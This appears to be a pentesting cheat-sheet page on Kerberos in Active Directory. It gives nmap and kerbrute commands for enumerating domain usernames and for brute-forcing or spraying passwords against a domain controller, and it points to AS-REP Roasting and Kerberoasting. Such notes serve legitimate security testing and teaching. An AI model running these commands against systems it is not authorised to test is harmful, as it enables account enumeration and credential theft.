Active Directory

An authentication protocol that is used to verify the identity of a user or host. It uses cryptography for authentication and is consisted of the client, the server, and the Key Distribution Center (KDC). A default port is 88. Kerberos also uses a 464 port for changing passwords.

Enumeration

To enumerate automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth bruteforcing.
The wordlist (e.g. combos.txt) specified must be the "username:password" combinations.

# -v: verbose mode *it's recommended to add this flag otherwise we cannot confirm if the user exist or not.
# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce -v --dc 10.0.0.1 -d example.domain combos.txt

# Users enumeration
kerbrute userenum -v --dc 10.0.0.1 -d example.domain usernames.txt

# Brute force user's password
kerbture bruteuser -v --dc 10.0.0.1 -d example.domain passwords.txt username

AS-REP Roasting

We might be able to find password hashes of user accounts that does not require preauthentication.
Please see AS-REP Roasting.

Kerberoasting Attack

If we have a password of some user, we might be able to gather another user credential.
Please see Kerberoasting Attack.

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Kerberos Pentesting

Enumeration

Brute Force Authentication

AS-REP Roasting

Kerberoasting Attack

ON THIS PAGE